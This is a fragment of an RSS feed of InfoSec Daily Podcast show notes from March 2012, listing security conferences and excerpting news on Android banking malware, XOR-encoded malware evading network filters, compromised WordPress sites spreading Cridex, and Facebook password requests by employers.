<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the XML commands are run, the malware creates a system event that executes at a future time and then listens for commands from control servers that cause the device to send the required information, and to add updates that allow the malware to update itself and to initiate spyware. This, in turn, allows the control server to gather additional credentials that will allow the server operator to gain access to the user&#39;s bank accounts.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This threat is basically a phishing attack so the user can be tricked into believing that it is a legitimate application from a real bank,&rdquo; Castillo wrote in an email interview.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-627-no-password-for-you-added-an-s-no-damage-paypal-epilepsy-foundation-and-android-malware/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3680/0/infosec-daily-podcast-episode-627.mp3" length="18213466" type="audio/mpeg" />
		<itunes:duration>0:37:51</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 627 for March 23, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	http://w[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 627 for March 23, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	http://www.Infosecsouthwest.com
&#160;
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: http://www.forbes.com/sites/kashmirhill/2012/03/22/senator-wants-to-make-it-illegal-for-employers-to-ask-for-your-facebook-password/
Source: http://mashable.com/2012/03/23/facebook-responds-employers-passwords/
&#160;
This week, a big AP story captured the nation&#8217;s attention by pointing out that some employers are asking job seekers for their Facebook passwords:
&#160;
&#8220;In their efforts to vet applicants, some companies and government agencies are going beyond merely glancing at a person&#8217;s social networking profiles and instead asking to log in as the user to have a look around.&#8221;
&#160;
After reading the story, many an American was aghast. But privacy attorney Behnam Dayanim told me earlier this month that, while it may be improper in terms of social conventions, it&#8217;s actually legal for employers to do this (unless you want to split hairs about it violating Facebook&#8217;s TOS).
&#8230;
Source: http://searchengineland.com/firefox-to-use-google-secure-search-by-default-116231
An inconspicuous &#34;s&#34; added to various ​lines of code in its latest nightly builds means that future versions of Firefox will send all search queries to Google in encrypted form. This means that instead of HTTP, the open source browser will use the HTTPS protocol, which encrypts traffic between the web site and browser using SSL. The nightly builds will feed through, over the next few months, until the feature is, most probably, in Firefox 14.
The change has been prompted by a discussion between Firefox developers which started about a year ago. Then, Google opposed making SSL the default, with Adam Langley, a member of Google&#39;s security team, explaining that the encrypted search was slower than the standard unencrypted search.
Google has since made encryption the global default for its own search site, though only for signed-in use[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 626 &#8211; Mind the Log, Top 7 Improvements, XOR Bypass, WordPress Blackhole, China Hacking, They’re Already There, and CA DoS</title>
		<link>http://www.isdpodcast.com/episode-626-mind-the-log-top-7-improvements-xor-bypass-wordpress-blackhole-china-hacking-theyre-already-there-and-ca-ddos</link>
		<comments>http://www.isdpodcast.com/episode-626-mind-the-log-top-7-improvements-xor-bypass-wordpress-blackhole-china-hacking-theyre-already-there-and-ca-ddos#comments</comments>
		<pubDate>Fri, 23 Mar 2012 00:56:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3672</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 626 for March 22, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: InfoSec Southwest When: March 30-April 1 Where: Austin, TX http://www.Infosecsouthwest.com &#160; Outerz0ne 8 When:April 20th-21st Where:Wellesley Inn, Atlanta GA. http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 626 for March 22, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1<br class="kix-line-break" /><br />
	Where: Austin, TX<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When:April 20th-21st</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:Wellesley Inn, Atlanta GA.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tool: &nbsp;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.irongeek.com/i.php?page=security/logwatch-script-grep-for-rfis-webscanners-webshell-attacks"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.irongeek.com/i.php?page=security/logwatch-script-grep-for-rfis-webscanners-webshell-attacks</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://thehackernews.com/2012/03/7-ways-to-improve-your-networks-web.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thehackernews.com/2012/03/7-ways-to-improve-your-networks-web.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Admins looking to improve on their company&rsquo;s web security often turn to software solutions to help assess and automate their security tasks. Good web security software can make surfing the web safe and secure by protecting users from potential vulnerabilities in their operating systems or browsers, as well as helping them to avoid policy violations. The top web security software packages can help you to improve your network&rsquo;s web security in many ways. Here are seven of the major benefits web security software offers:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://blog.damballa.com/?p=1543"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.damballa.com/?p=1543</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many organizations I speak with have instigated network filtering and security monitoring solutions targeted at identifying malicious binaries traversing their egress points. Something that they&rsquo;ve been observing in recent months is the increase of suspicious binaries that are unsupported and non-executable. Ordinarily any intercepted binaries would be farmed off to static anti-virus scanners or tin-wrapped behavioral analysis engines for classification; however a growing volume of these binaries cannot be scanned or executed within virtual environments. What&rsquo;s going on?</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More often than not, these perimeter network defenses are encountering encoded and obfuscated malicious binaries &ndash; constructed purposefully by an attacker to bypass network threat detection products. These evasions aren&rsquo;t anything new, it&rsquo;s just that the tools and functionality to encode malicious binaries &ldquo;on-the-fly&rdquo; have become standard features in a growing number of automated attack delivery tools and DIY botnet construction kits.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The non-executable binaries are typically malicious binaries that have been encoded using simple, light weight, cryptographic techniques. They need to be decoded at the receivers end and decrypted back in to their &ldquo;original&rdquo; file format for proper malicious execution. In many cases the entire (original) malicious binary is encrypted using a simple</span><a href="http://en.wikipedia.org/wiki/XOR_cipher"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> XOR cipher</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. While there are no shortage of techniques that can be used (take a look at the default assortment of file encoders within the</span><a href="http://www.scribd.com/gregorius_kristianto/d/70191009/112-Encoding-with-MSFencode"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Metasploit MSFencode module</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for instance),</span><a href="http://en.wikipedia.org/wiki/Exclusive_or"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> XOR</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> does seem popular and is more than &ldquo;good enough&rdquo; to bypass existing security technologies. Sometimes the simplest evasion techniques are the best.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://blog.trendmicro.com/compromised-wordpress-sites-drive-users-to-blackhole-exploit-kit/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/compromised-wordpress-sites-drive-users-to-blackhole-exploit-kit/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TrendMicro has been alerted to</span><a href="http://labs.m86security.com/2012/03/the-cridex-trojan-targets-137-financial-organizations-in-one-go/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> reports</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of a mass compromise of WordPress sites that lead to CRIDEX infection. To lure users to these compromised sites, the cybercriminals behind this employed spammed messages purporting to come from known legitimate sources such Better Business Bureau and LinkedIn, just to name a few. These spam use social engineering tactics to entice unsuspecting users to click the link found in the email.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><img height="310px;" src="https://lh4.googleusercontent.com/tlT1UUbJfqF5lkomoEC6-QI2zthHYJB_D0JayJCaoaGCxEpX-oXqpViSf_qMrTdjWvVcl0lk5dmld6hoVmmrH1U8SHM_7YaX3qYNVcA3Gj-6C-8aEhA" width="300px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><img height="300px;" src="https://lh3.googleusercontent.com/xCRcXUImA2QPeVtQDA6m7zAlpsVRFLMBRU0JC3WW60L5uGty6Qht4tOhpCWHwXcgwAuAKgdk_o5wRdbNyqQY1UWiZ_l_QJmha0c9H4k0gHwk1FE_wYc" width="300px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
